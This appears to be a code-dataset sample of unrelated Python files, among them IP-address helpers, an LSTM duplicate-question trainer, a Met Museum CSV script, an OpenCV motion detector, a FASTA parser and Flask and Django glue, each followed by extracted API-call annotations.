import socket, struct, six def in_net(ipint, net): #ipaddr = socket.inet_aton(ip) netaddr, netmask = net.split('/') netaddr = socket.inet_aton(netaddr) #ipint = struct.unpack("!I", ipaddr)[0] netint = struct.unpack("!I", netaddr)[0] maskint = (0xFFFFFFFF << (32 - int(netmask))) & 0xFFFFFFFF return ipint & maskint == netint # http://stackoverflow.com/a/9591005 def ip2int(ip): """Convert an IP in dot-decimal notation to int. :param ip: string. """ if not isinstance(ip, six.string_types): raise ValueError("ip must be str and is {0} instead".format(type(ip))) ip = str(ip) packedIP = socket.inet_aton(ip) return struct.unpack("!I", packedIP)[0] def int2ip(ip): """Convert an IP in an 32bit int to a string in dot-decimal notation. :param ip: int """ if not isinstance(ip, int): raise ValueError("ip must be int and is {0} instead".format(type(ip))) return socket.inet_ntoa(struct.pack('!I', ip))
[ "struct.unpack", "socket.inet_aton", "struct.pack" ]
[((130, 155), 'socket.inet_aton', 'socket.inet_aton', (['netaddr'], {}), '(netaddr)\n', (146, 155), False, 'import socket, struct, six\n'), ((606, 626), 'socket.inet_aton', 'socket.inet_aton', (['ip'], {}), '(ip)\n', (622, 626), False, 'import socket, struct, six\n'), ((208, 236), 'struct.unpack', 'struct.unpack', (['"""!I"""', 'netaddr'], {}), "('!I', netaddr)\n", (221, 236), False, 'import socket, struct, six\n'), ((635, 664), 'struct.unpack', 'struct.unpack', (['"""!I"""', 'packedIP'], {}), "('!I', packedIP)\n", (648, 664), False, 'import socket, struct, six\n'), ((905, 926), 'struct.pack', 'struct.pack', (['"""!I"""', 'ip'], {}), "('!I', ip)\n", (916, 926), False, 'import socket, struct, six\n')]
from time import time import pandas as pd import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split import numpy as np import tensorflow as tf import argparse from tensorflow.python.keras.models import Model, Sequential from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout from sklearn.metrics import f1_score, roc_auc_score, accuracy_score from util import make_w2v_embeddings from util import split_and_zero_padding from util import ManDist, generate_confidence_intervals import os from keras.backend.tensorflow_backend import set_session np.random.seed(42) parser = argparse.ArgumentParser(description='Paraphraser') parser.add_argument('--gpu', type=int, default=3, metavar='NI', help='gpu id') parser.add_argument('--filename', type=str, default='train_df.csv' , help='Train File') args = parser.parse_args() filename = args.filename gpuid = args.gpu os.environ["CUDA_VISIBLE_DEVICES"] = str(gpuid) config = tf.ConfigProto() config.gpu_options.allow_growth = True BUILD_EMBED =True # Make word2vec embeddings embedding_dim = 300 max_seq_length = 20 def int_pred(preds, thres): predsx = preds.copy() predsx[predsx>thres] = 1 predsx[predsx<=thres] = 0 return predsx # File paths TRAIN_CSV = str(filename) train_file= TRAIN_CSV.split('/')[-1] print(train_file) TEST_CSV= './data/quora/test_df.csv' # Load training set train_df = pd.read_csv(TRAIN_CSV) train_size = train_df.shape[0] # train_df = train_df.iloc[:int(train_size/5.0)] print(train_df.shape) test_df = pd.read_csv(TEST_CSV) print(test_df.shape) for q in ['question1', 'question2']: train_df[q + '_n'] = train_df[q] test_df[q + '_n'] = test_df[q] test_df = test_df[train_df.columns] use_w2v = True print('-------------') # print(train_df.head()) # print(test_df.head()) train_size= train_df.shape[0] print('train size: {}'.format(train_size)) print('-------------') if BUILD_EMBED == True: full_df = train_df.append(test_df, ignore_index=True) full_df, embeddings = make_w2v_embeddings(full_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v) print("sentences embedded") else: # full_df= pd.read_csv('./data/full_embeddings_A1.csv') # embeddings = np.load('./data/embeddings/embedding_matrix_A1.npy') print('embeddings loaded') train_df = full_df.iloc[:train_size].copy() test_df = full_df.iloc[train_size:].copy() print('--------------------------') # print(train_df.head()) # print(test_df.head()) print('--------------------------') # test_df, embeddingsx = make_w2v_embeddings(test_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v) # print("sentences embedded") # test_df.to_csv('./data/test_embeddings.csv', index= False) # Split to train validation validation_size = 0.2 # training_size = len(train_df) - validation_size X = train_df[['question1_n', 'question2_n']] Y = train_df['is_duplicate'] X_train, X_validation, Y_train, Y_validation = train_test_split(X, Y, test_size=validation_size, random_state= 42) X_test = test_df[['question1_n', 'question2_n']] Y_test = test_df['is_duplicate'] X_train = split_and_zero_padding(X_train, max_seq_length) X_validation = split_and_zero_padding(X_validation, max_seq_length) X_test= split_and_zero_padding(X_test, max_seq_length) # Convert labels to their numpy representations Y_train = Y_train.values Y_validation = Y_validation.values Y_test = Y_test.values # Make sure everything is ok assert X_train['left'].shape == X_train['right'].shape assert len(X_train['left']) == len(Y_train) # -- # Model variables gpus = 1 batch_size = 1024 * gpus n_epoch = 40 n_hidden = 50 # Define the shared model with tf.device('/gpu:0'): set_session(tf.Session(config=config)) x = Sequential() x.add(Embedding(len(embeddings), embedding_dim, weights=[embeddings], input_shape=(max_seq_length,), trainable=False)) # CNN # x.add(Conv1D(250, kernel_size=5, activation='relu')) # x.add(GlobalMaxPool1D()) # x.add(Dense(250, activation='relu')) # x.add(Dropout(0.3)) # x.add(Dense(50, activation='sigmoid')) # LSTM x.add(LSTM(n_hidden)) shared_model = x # The visible layer left_input = Input(shape=(max_seq_length,), dtype='int32') right_input = Input(shape=(max_seq_length,), dtype='int32') # Pack it all up into a Manhattan Distance model malstm_distance = ManDist()([shared_model(left_input), shared_model(right_input)]) model = Model(inputs=[left_input, right_input], outputs=[malstm_distance]) model.compile(loss='mean_squared_error', optimizer=tf.keras.optimizers.Adam(), metrics=['accuracy']) model.summary() shared_model.summary() ############################ # Start training training_start_time = time() malstm_trained = model.fit([X_train['left'], X_train['right']], Y_train, batch_size=batch_size, epochs=3, validation_data=([X_validation['left'], X_validation['right']], Y_validation)) training_end_time = time() print('INITIAL SCORES') print('--------------------------') preds = model.predict([X_validation['left'], X_validation['right']], batch_size=batch_size ) predsx = preds.copy() predsx[predsx>0.4] = 1 predsx[predsx<=0.4] = 0 print("DEV F1 Score: {},\t DEV AUC ROC : {},\t DEV ACC: {}".format(f1_score(Y_validation, predsx), roc_auc_score(Y_validation, preds), accuracy_score(Y_validation, predsx) )) preds = model.predict([X_test['left'], X_test['right']], batch_size=batch_size ) predsx = preds.copy() predsx[predsx>0.4] = 1 predsx[predsx<=0.4] = 0 print("TEST F1 Score: {},\t TEST AUC ROC : {},\t TEST ACC: {}".format(f1_score(Y_test, predsx), roc_auc_score(Y_test, preds), accuracy_score(Y_test, predsx) )) ###################################### training_start_time = time() malstm_trained = model.fit([X_train['left'], X_train['right']], Y_train, batch_size=batch_size, epochs=n_epoch, validation_data=([X_validation['left'], X_validation['right']], Y_validation)) training_end_time = time() model.save('./data/SiameseLSTM_epoch25.h5') print('FINAL SCORES') print('--------------------------') preds = model.predict([X_validation['left'], X_validation['right']], batch_size=batch_size ) thres = 0.4 predsx = preds.copy() predsx[predsx>thres] = 1 predsx[predsx<=thres] = 0 dev_score= "DEV F1 Score: {},\t DEV AUC ROC : {},\t DEV ACC: {}".format(f1_score(Y_validation, predsx), roc_auc_score(Y_validation, preds), accuracy_score(Y_validation, predsx) ) print(dev_score) preds = model.predict([X_test['left'], X_test['right']], batch_size=batch_size ) predsx = preds.copy() predsx[predsx>thres] = 1 predsx[predsx<=thres] = 0 test_score= "TEST F1 Score: {},\t TEST AUC ROC : {},\t TEST ACC: {}".format(f1_score(Y_test, predsx), roc_auc_score(Y_test, preds), accuracy_score(Y_test, predsx) ) print(test_score) acc_scores =[] thr = 0.4 acc_scores.append(accuracy_score(Y_test, int_pred(preds, thr))) sv_scores = "ACC SCORES : {}".format(str(acc_scores)) print(sv_scores) final_preds = np.array(list(zip(Y_test, preds, predsx))) np.save('./data/preds/predsLSTM_'+str(train_file)+ '.npy', final_preds) print('--------------------------') print("Training time finished.\n%d epochs in %12.2f" % (n_epoch, training_end_time - training_start_time)) fo = open('./data/scores_lstm/scoresLSTM_'+str(train_file)+ '.txt', 'w') fo.write(train_file+'\n') fo.write('-----------\n') fo.write(sv_scores+'\n') fo.write('-----------\n') fo.write(test_score+'\n') fo.close() print(str(malstm_trained.history['val_acc'][-1])[:6] + "(max: " + str(max(malstm_trained.history['val_acc']))[:6] + ")") print("Done.") print(train_df.shape) print(train_file)
[ "util.ManDist", "pandas.read_csv", "sklearn.metrics.roc_auc_score", "tensorflow.python.keras.layers.Input", "argparse.ArgumentParser", "tensorflow.python.keras.models.Model", "tensorflow.Session", "util.split_and_zero_padding", "numpy.random.seed", "tensorflow.ConfigProto", "tensorflow.python.keras.models.Sequential", "tensorflow.python.keras.layers.LSTM", "tensorflow.device", "matplotlib.use", "sklearn.model_selection.train_test_split", "time.time", "sklearn.metrics.accuracy_score", "sklearn.metrics.f1_score", "tensorflow.keras.optimizers.Adam", "util.make_w2v_embeddings" ]
[((60, 81), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (74, 81), False, 'import matplotlib\n'), ((676, 694), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (690, 694), True, 'import numpy as np\n'), ((705, 755), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Paraphraser"""'}), "(description='Paraphraser')\n", (728, 755), False, 'import argparse\n'), ((1051, 1067), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (1065, 1067), True, 'import tensorflow as tf\n'), ((1476, 1498), 'pandas.read_csv', 'pd.read_csv', (['TRAIN_CSV'], {}), '(TRAIN_CSV)\n', (1487, 1498), True, 'import pandas as pd\n'), ((1611, 1632), 'pandas.read_csv', 'pd.read_csv', (['TEST_CSV'], {}), '(TEST_CSV)\n', (1622, 1632), True, 'import pandas as pd\n'), ((2980, 3046), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'Y'], {'test_size': 'validation_size', 'random_state': '(42)'}), '(X, Y, test_size=validation_size, random_state=42)\n', (2996, 3046), False, 'from sklearn.model_selection import train_test_split\n'), ((3142, 3189), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_train', 'max_seq_length'], {}), '(X_train, max_seq_length)\n', (3164, 3189), False, 'from util import split_and_zero_padding\n'), ((3205, 3257), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_validation', 'max_seq_length'], {}), '(X_validation, max_seq_length)\n', (3227, 3257), False, 'from util import split_and_zero_padding\n'), ((3266, 3312), 'util.split_and_zero_padding', 'split_and_zero_padding', (['X_test', 'max_seq_length'], {}), '(X_test, max_seq_length)\n', (3288, 3312), False, 'from util import split_and_zero_padding\n'), ((2080, 2165), 'util.make_w2v_embeddings', 'make_w2v_embeddings', (['full_df'], {'embedding_dim': 'embedding_dim', 'empty_w2v': '(not use_w2v)'}), '(full_df, embedding_dim=embedding_dim, empty_w2v=not use_w2v\n )\n', (2099, 2165), False, 'from util import make_w2v_embeddings\n'), ((3692, 3711), 'tensorflow.device', 'tf.device', (['"""/gpu:0"""'], {}), "('/gpu:0')\n", (3701, 3711), True, 'import tensorflow as tf\n'), ((3758, 3770), 'tensorflow.python.keras.models.Sequential', 'Sequential', ([], {}), '()\n', (3768, 3770), False, 'from tensorflow.python.keras.models import Model, Sequential\n'), ((4178, 4223), 'tensorflow.python.keras.layers.Input', 'Input', ([], {'shape': '(max_seq_length,)', 'dtype': '"""int32"""'}), "(shape=(max_seq_length,), dtype='int32')\n", (4183, 4223), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4239, 4284), 'tensorflow.python.keras.layers.Input', 'Input', ([], {'shape': '(max_seq_length,)', 'dtype': '"""int32"""'}), "(shape=(max_seq_length,), dtype='int32')\n", (4244, 4284), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4429, 4495), 'tensorflow.python.keras.models.Model', 'Model', ([], {'inputs': '[left_input, right_input]', 'outputs': '[malstm_distance]'}), '(inputs=[left_input, right_input], outputs=[malstm_distance])\n', (4434, 4495), False, 'from tensorflow.python.keras.models import Model, Sequential\n'), ((4712, 4718), 'time.time', 'time', ([], {}), '()\n', (4716, 4718), False, 'from time import time\n'), ((4946, 4952), 'time.time', 'time', ([], {}), '()\n', (4950, 4952), False, 'from time import time\n'), ((5741, 5747), 'time.time', 'time', ([], {}), '()\n', (5745, 5747), False, 'from time import time\n'), ((5981, 5987), 'time.time', 'time', ([], {}), '()\n', (5985, 5987), False, 'from time import time\n'), ((3726, 3751), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (3736, 3751), True, 'import tensorflow as tf\n'), ((4107, 4121), 'tensorflow.python.keras.layers.LSTM', 'LSTM', (['n_hidden'], {}), '(n_hidden)\n', (4111, 4121), False, 'from tensorflow.python.keras.layers import Input, Embedding, LSTM, GRU, Conv1D, Conv2D, GlobalMaxPool1D, Dense, Dropout\n'), ((4355, 4364), 'util.ManDist', 'ManDist', ([], {}), '()\n', (4362, 4364), False, 'from util import ManDist, generate_confidence_intervals\n'), ((6351, 6381), 'sklearn.metrics.f1_score', 'f1_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (6359, 6381), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6383, 6417), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_validation', 'preds'], {}), '(Y_validation, preds)\n', (6396, 6417), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6419, 6455), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (6433, 6455), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6713, 6737), 'sklearn.metrics.f1_score', 'f1_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (6721, 6737), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6739, 6767), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_test', 'preds'], {}), '(Y_test, preds)\n', (6752, 6767), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((6769, 6799), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (6783, 6799), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((4549, 4575), 'tensorflow.keras.optimizers.Adam', 'tf.keras.optimizers.Adam', ([], {}), '()\n', (4573, 4575), True, 'import tensorflow as tf\n'), ((5251, 5281), 'sklearn.metrics.f1_score', 'f1_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (5259, 5281), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5283, 5317), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_validation', 'preds'], {}), '(Y_validation, preds)\n', (5296, 5317), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5319, 5355), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_validation', 'predsx'], {}), '(Y_validation, predsx)\n', (5333, 5355), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5587, 5611), 'sklearn.metrics.f1_score', 'f1_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (5595, 5611), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5613, 5641), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['Y_test', 'preds'], {}), '(Y_test, preds)\n', (5626, 5641), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n'), ((5643, 5673), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['Y_test', 'predsx'], {}), '(Y_test, predsx)\n', (5657, 5673), False, 'from sklearn.metrics import f1_score, roc_auc_score, accuracy_score\n')]
from __future__ import absolute_import from django.conf import settings import jinja2 from ..contextutil import context_to_dict class Jinja2Template(object): def __init__(self, template_obj): self.template_obj=template_obj def render(self, context): return self.template_obj.render(context_to_dict(context)) def get_template_from_string(source, origin=None, name=None): opts=getattr(settings, 'JINJA2_TEMPLATE_OPTS', {}) if opts: opts=opts.copy() if not 'loader' in opts: opts['loader']=jinja2.FileSystemLoader(settings.JINJA2_TEMPLATE_DIRS) environment=jinja2.Environment(**opts) template=environment.from_string(source) template.name=name return Jinja2Template(template)
[ "jinja2.FileSystemLoader", "jinja2.Environment" ]
[((627, 653), 'jinja2.Environment', 'jinja2.Environment', ([], {}), '(**opts)\n', (645, 653), False, 'import jinja2\n'), ((555, 609), 'jinja2.FileSystemLoader', 'jinja2.FileSystemLoader', (['settings.JINJA2_TEMPLATE_DIRS'], {}), '(settings.JINJA2_TEMPLATE_DIRS)\n', (578, 609), False, 'import jinja2\n')]
#importing csv & json module import csv import json # csv file name inp_filename = "MetObjects.csv" out_filename1 = "Uniqueyearnode.csv" out_filename2 = "Uniqueyearedge.csv" out_filename3 = "uniqueyear-met.csv" #initializing the titles and rows list Artist_Nationality = "American" Unique_year = [] #----------------------- v lookup and create unique id year_id_lookup = {} unique_year_id_number = 2013 #----------------------- output list museumname1 = "MET" museumid = "1" typemet = "Directed" Weightmet = "1" #readdata from csv with open(inp_filename, 'r') as in_Met: reader = csv.DictReader(in_Met) ## CSV is open and reading ready for row in reader: artistcol = row['Artist Display Name'] year = row['Object Begin Date'] Object = row['Title'] if 'Modern and Contemporary Art' in row ['Department'] and Artist_Nationality in row['Artist Nationality']: if row['Object Begin Date'] not in Unique_year: Unique_year.append(row['Object Begin Date']) year_id_lookup[row['Object Begin Date']] = unique_year_id_number unique_year_id_number = unique_year_id_number + 1 # output yearnode with open(out_filename1,'w') as out_MET1: writer= csv.writer(out_MET1) writer.writerow(['Label2', 'id', 'node']) for uniyear in Unique_year: writer.writerow([uniyear,year_id_lookup[uniyear],year_id_lookup[uniyear]]) # output year and met edge with open(out_filename2,'w') as out_MET2: writer= csv.writer(out_MET2) writer.writerow(['Label','Museum','source','target','Type','Weight']) for uniyear in Unique_year: writer.writerow([uniyear,museumname1,museumid,year_id_lookup[uniyear],typemet,Weightmet]) # output yearnode with open(out_filename3,'w') as out_MET3: writer= csv.writer(out_MET3) writer.writerow(['Label2']) for uniyear in Unique_year: writer.writerow([uniyear,museumname1]) #row['Department'], row['Title'],row['Artist Display Name'], row['Object Begin Date'],row['Medium'], row['Dimensions'] # if row['Artist Display Name'] not in Artsit: # Artsit.append(row['Artist Display Name'])
[ "csv.writer", "csv.DictReader" ]
[((591, 613), 'csv.DictReader', 'csv.DictReader', (['in_Met'], {}), '(in_Met)\n', (605, 613), False, 'import csv\n'), ((1259, 1279), 'csv.writer', 'csv.writer', (['out_MET1'], {}), '(out_MET1)\n', (1269, 1279), False, 'import csv\n'), ((1548, 1568), 'csv.writer', 'csv.writer', (['out_MET2'], {}), '(out_MET2)\n', (1558, 1568), False, 'import csv\n'), ((1848, 1868), 'csv.writer', 'csv.writer', (['out_MET3'], {}), '(out_MET3)\n', (1858, 1868), False, 'import csv\n')]
import cv2 import time import argparse #importing the neccessery libraries cv2.ocl.setUseOpenCL(False) #disenabling opencl because it causes an error to do with teh background subtraction ap = argparse.ArgumentParser() ap.add_argument("-a", "--min-area", type=int, default=200, help="minimum area") args = vars(ap.parse_args()) #arguement parser with minimum area for it to pick up as motion cap = cv2.VideoCapture(0) #getting the video out from the webcam fgbg = cv2.createBackgroundSubtractorMOG2() #getting the background subtractor ready for use while (1): ret, frame = cap.read() #starting the loop while reading from the video capture fgmask = fgbg.apply(frame) #applying the bakground subtractor thresh = fgmask thresh = cv2.GaussianBlur(thresh, (21, 21), 0) thresh = cv2.threshold(thresh, 127, 255, cv2.THRESH_BINARY)[1] thresh = cv2.dilate(thresh, None, iterations=1) #making the image binary and adjusting it for the contouring _, cnts, _= cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #find the contours aroung the edges of the motion for c in cnts: if cv2.contourArea(c) < args["min_area"]: continue #putting the contour area through the arguement parser for minimum area c = max(cnts, key=cv2.contourArea) (x, y, w, h) = cv2.boundingRect(c) cv2.rectangle(frame, (x, y), (x+ w, y + h), (0, 0, 255), 2) #draw the rectangle around the object cv2.imshow("Feed", frame) #show the image in a new window key = cv2.waitKey(1) & 0xFF if key == ord("s"): break #break the loop cap.release() cv2.destroyAllWindows() #stop the windows
[ "cv2.ocl.setUseOpenCL", "cv2.createBackgroundSubtractorMOG2", "cv2.rectangle", "argparse.ArgumentParser", "cv2.threshold", "cv2.imshow", "cv2.contourArea", "cv2.destroyAllWindows", "cv2.VideoCapture", "cv2.dilate", "cv2.GaussianBlur", "cv2.waitKey", "cv2.boundingRect" ]
[((77, 104), 'cv2.ocl.setUseOpenCL', 'cv2.ocl.setUseOpenCL', (['(False)'], {}), '(False)\n', (97, 104), False, 'import cv2\n'), ((196, 221), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (219, 221), False, 'import argparse\n'), ((402, 421), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (418, 421), False, 'import cv2\n'), ((469, 505), 'cv2.createBackgroundSubtractorMOG2', 'cv2.createBackgroundSubtractorMOG2', ([], {}), '()\n', (503, 505), False, 'import cv2\n'), ((1680, 1703), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1701, 1703), False, 'import cv2\n'), ((769, 806), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['thresh', '(21, 21)', '(0)'], {}), '(thresh, (21, 21), 0)\n', (785, 806), False, 'import cv2\n'), ((887, 925), 'cv2.dilate', 'cv2.dilate', (['thresh', 'None'], {'iterations': '(1)'}), '(thresh, None, iterations=1)\n', (897, 925), False, 'import cv2\n'), ((1513, 1538), 'cv2.imshow', 'cv2.imshow', (['"""Feed"""', 'frame'], {}), "('Feed', frame)\n", (1523, 1538), False, 'import cv2\n'), ((820, 870), 'cv2.threshold', 'cv2.threshold', (['thresh', '(127)', '(255)', 'cv2.THRESH_BINARY'], {}), '(thresh, 127, 255, cv2.THRESH_BINARY)\n', (833, 870), False, 'import cv2\n'), ((1374, 1393), 'cv2.boundingRect', 'cv2.boundingRect', (['c'], {}), '(c)\n', (1390, 1393), False, 'import cv2\n'), ((1402, 1462), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(x, y)', '(x + w, y + h)', '(0, 0, 255)', '(2)'], {}), '(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n', (1415, 1462), False, 'import cv2\n'), ((1585, 1599), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (1596, 1599), False, 'import cv2\n'), ((1167, 1185), 'cv2.contourArea', 'cv2.contourArea', (['c'], {}), '(c)\n', (1182, 1185), False, 'import cv2\n')]
from webtest import TestApp # from boddle import boddle import kafka_selfservice # def test_webapp_index(): # with boddle(params={'name': 'Derek'}): # assert kafka_selfservice.index() == 'Hi Derek!' def test_webapp_ping(): app = TestApp(kafka_selfservice.app) assert app.get('/v1/ping').status == '200 OK'
[ "webtest.TestApp" ]
[((239, 269), 'webtest.TestApp', 'TestApp', (['kafka_selfservice.app'], {}), '(kafka_selfservice.app)\n', (246, 269), False, 'from webtest import TestApp\n')]
#! /usr/bin/python3 import random # fasta_chars = "ANDRCGQEHILKMFPSTYWV" codec = { "A": (0, 0, 0, 0, 0), "N": (0, 0, 0, 0, 1), "D": (0, 0, 0, 1, 0), "R": (0, 0, 0, 1, 1), "C": (0, 0, 1, 0, 0), "G": (0, 0, 1, 0, 1), "Q": (0, 0, 1, 1, 0), "E": (0, 0, 1, 1, 1), "H": (0, 1, 0, 0, 0), "I": (0, 1, 0, 0, 1), "L": (0, 1, 0, 1, 0), "K": (0, 1, 0, 1, 1), "M": (0, 1, 1, 0, 0), "F": (0, 1, 1, 0, 1), "P": (0, 1, 1, 1, 0), "S": (0, 1, 1, 1, 1), "T": (1, 0, 0, 0, 0), "Y": (1, 0, 0, 1, 0), "W": (1, 0, 0, 0, 1), "V": (1, 0, 0, 1, 1) } def get_fchar_for_code(code): for fc in codec: if codec[fc] == code: return fc return None def get_fstr_for_codes(codeseq): if len(codeseq) % 5 != 0: raise Exception("codeseq must be a multiple of code width (which is 5)") res = list() for i in range(len(codeseq) // 5): cur_code = tuple( codeseq[i * 5 : (i+1) * 5] ) cur_fchar = get_fchar_for_code(cur_code) if cur_fchar is not None: res.append(cur_fchar) else: res.append("-") return "".join(res) #class _FastaCodeIterator: # def __init__(self, fasta_string, window): # if len(fasta_string) < window: # raise Exception("fasta_string must be long enough to form at least 1 window") # # self.fasta_string = fasta_string # self.window = window # # self.i = 0 # # def __next__(self): # if self.i > len(self.fasta_string) - self.window: # raise StopIteration # # code = list() # for w in range(self.window): # c = self.fasta_string[self.i + w] # if c not in codec: # raise Exception("fasta string contained character not in codec") # # for num in codec[c]: # code.append(num) # # self.i += 1 # # return code def get_code_iterator(fasta_string, window): for i in range( (len(fasta_string) - window) + 1): res = list() for w in range(window): c = fasta_string[i + w] if c not in codec: raise Exception("non-FASTA character in fasta string") for e in codec[c]: res.append(e) yield res class FastaParser: def __init__(self): self.records = [] def add_from_stream(self, fstream): last_record = "" for line in fstream: line.strip() if len(line) < 1: continue if line[0] == '>' or line[0] == ';': # store record if there is one if len(last_record) > 0: self.records.append( last_record ) last_record = "" continue for char in line: if char in codec: last_record += char if len(last_record) > 0: self.records.append( last_record ) def add_from_file(self, filename): with open(filename, "r") as ifile: self.add_from_stream(ifile) def clear(self): self.records.clear() # def get_fasta_iterator(self, window): # fstring = random.choice(self.records) # # return _FastaCodeIterator(fstring, window) def get_random_record(self): return random.choice(self.records) def get_iter_for_random_record(self, window): return get_code_iterator(random.choice(self.records), window)
[ "random.choice" ]
[((3361, 3388), 'random.choice', 'random.choice', (['self.records'], {}), '(self.records)\n', (3374, 3388), False, 'import random\n'), ((3473, 3500), 'random.choice', 'random.choice', (['self.records'], {}), '(self.records)\n', (3486, 3500), False, 'import random\n')]
import unittest from uuid import ( uuid4, ) from tests.utils import ( Product, ) class TestExternalEntity(unittest.TestCase): def test_values(self): uuid = uuid4() product = Product(uuid, 3, "apple", 3028) self.assertEqual(uuid, product.uuid) self.assertEqual(3, product.version) self.assertEqual("apple", product.title) self.assertEqual(3028, product.quantity) if __name__ == "__main__": unittest.main()
[ "unittest.main", "tests.utils.Product", "uuid.uuid4" ]
[((459, 474), 'unittest.main', 'unittest.main', ([], {}), '()\n', (472, 474), False, 'import unittest\n'), ((179, 186), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (184, 186), False, 'from uuid import uuid4\n'), ((205, 236), 'tests.utils.Product', 'Product', (['uuid', '(3)', '"""apple"""', '(3028)'], {}), "(uuid, 3, 'apple', 3028)\n", (212, 236), False, 'from tests.utils import Product\n')]
from flask import current_app, Blueprint from flask_login import LoginManager from ooer.models.user import User login_manager = LoginManager() login_manager.login_view = 'auth.login' login_manager.login_message = u'Please log in to access this page.' login_manager.login_message_category = 'info' login_manager.refresh_view = 'auth.reauth' login_manager.needs_refresh_message = u'To protect your account, please reauthenticate to access this page.' login_manager.needs_refresh_message_category = 'info' @login_manager.user_loader def user_loader(id): return User.objects(id=id).first() login_manager.init_app(current_app, add_context_processor=True) blueprint = Blueprint('auth', __name__) from views import login, logout, forums
[ "flask_login.LoginManager", "ooer.models.user.User.objects", "flask.Blueprint" ]
[((130, 144), 'flask_login.LoginManager', 'LoginManager', ([], {}), '()\n', (142, 144), False, 'from flask_login import LoginManager\n'), ((675, 702), 'flask.Blueprint', 'Blueprint', (['"""auth"""', '__name__'], {}), "('auth', __name__)\n", (684, 702), False, 'from flask import current_app, Blueprint\n'), ((568, 587), 'ooer.models.user.User.objects', 'User.objects', ([], {'id': 'id'}), '(id=id)\n', (580, 587), False, 'from ooer.models.user import User\n')]
import os import sys from relogic.utils.file_utils import cached_path, RELOGIC_CACHE PACKAGE_PATH = { "Anserini": "https://git.uwaterloo.ca/p8shi/data-server/raw/master/anserini-0.6.0-SNAPSHOT-fatjar.jar" } anserini_cache_path = cached_path(PACKAGE_PATH['Anserini'], cache_dir=RELOGIC_CACHE) if sys.platform == 'win32': separator = ';' else: separator = ':' jar = os.path.join(separator + anserini_cache_path) if 'CLASSPATH' not in os.environ: os.environ['CLASSPATH'] = jar else: os.environ['CLASSPATH'] += jar
[ "os.path.join", "relogic.utils.file_utils.cached_path" ]
[((235, 297), 'relogic.utils.file_utils.cached_path', 'cached_path', (["PACKAGE_PATH['Anserini']"], {'cache_dir': 'RELOGIC_CACHE'}), "(PACKAGE_PATH['Anserini'], cache_dir=RELOGIC_CACHE)\n", (246, 297), False, 'from relogic.utils.file_utils import cached_path, RELOGIC_CACHE\n'), ((377, 422), 'os.path.join', 'os.path.join', (['(separator + anserini_cache_path)'], {}), '(separator + anserini_cache_path)\n', (389, 422), False, 'import os\n')]
